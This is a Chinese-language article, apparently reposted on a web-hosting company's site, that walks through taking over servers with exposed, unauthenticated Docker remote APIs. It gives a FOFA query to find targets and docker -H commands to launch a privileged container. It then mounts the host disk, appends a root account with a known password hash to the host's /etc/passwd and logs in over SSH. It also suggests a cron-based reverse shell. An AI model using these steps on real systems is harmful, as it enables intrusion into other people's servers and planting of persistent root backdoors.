实战Docker未授权访问提权-创新互联

1、fofa关键字 port=“2375” && body=“page not found”

2、docker -H tcp://ip:port 可查看到当前所有的实例

3、docker -H tcp://ip:port pull alpine

4、docker -H tcp://ip:port run -it --privileged alpine bin/sh

创新互联建站-专业网站定制、快速模板网站建设、高性价比泰安网站开发、企业建站全套包干低至880元,成熟完善的模板库,直接使用。一站式泰安网站制作公司更省心,省钱,快速模板网站建设找我们，业务覆盖泰安地区。费用合理售后完善，10多年实体公司更值得信赖。

5、fdisk -l 查看其分区结构

6、创建一个test目录，并且将其 /dev/vda2 挂载至test

7、通过whoami 和id可查看到当前的权限是root

8、cat /etc/passwd 查看当前所有的用户信息

9、通过如下命令强制将账号sql 密码123 写入其passwd文件
echo “sql:LRxM3nP3LOiYU:0:0:hello:/root:/bin/bash” >>/test/etc/passwd

10、现在即可通过新加的账号sql:123去ssh连接，此时已经成功连接上

常见问题：
1、挂载其分区后并未能将账号加进去，原因是你挂载的分区可能不是其主节点，尝试挂载其他分区
2、成功写入账号后无法ssh连接，可通过cat test/etc/ssh/ssh_config 看起ssh配置文件是否限制了ssh账号密码登录，如果是可直接通过vi命令改回来
3、可通过定时任务的方式反弹shell，解决一切难题

你是否还在寻找稳定的海外服务器提供商？创新互联www.cdcxhl.cn海外机房具备T级流量清洗系统配攻击溯源，准确流量调度确保服务器高可用性，企业级服务器适合批量采购，新人活动首月15元起，快前往官网查看详情吧

分享文章：实战Docker未授权访问提权-创新互联
本文路径：https://www.cdcxhl.com/article32/coicpc.html

成都网站建设公司_创新互联，为您提供移动网站建设、网站设计公司、品牌网站建设、做网站、搜索引擎优化、微信小程序

广告

声明：本网站发布的内容（图片、视频和文字）以用户投稿、用户转载内容为主，如果涉及侵权请尽快告知，我们将会在第一时间删除。文章观点不代表本网站立场，如需处理请联系客服。电话：028-86922220；邮箱：631063699@qq.com。内容未经允许不得转载，或转载时需注明来源： 创新互联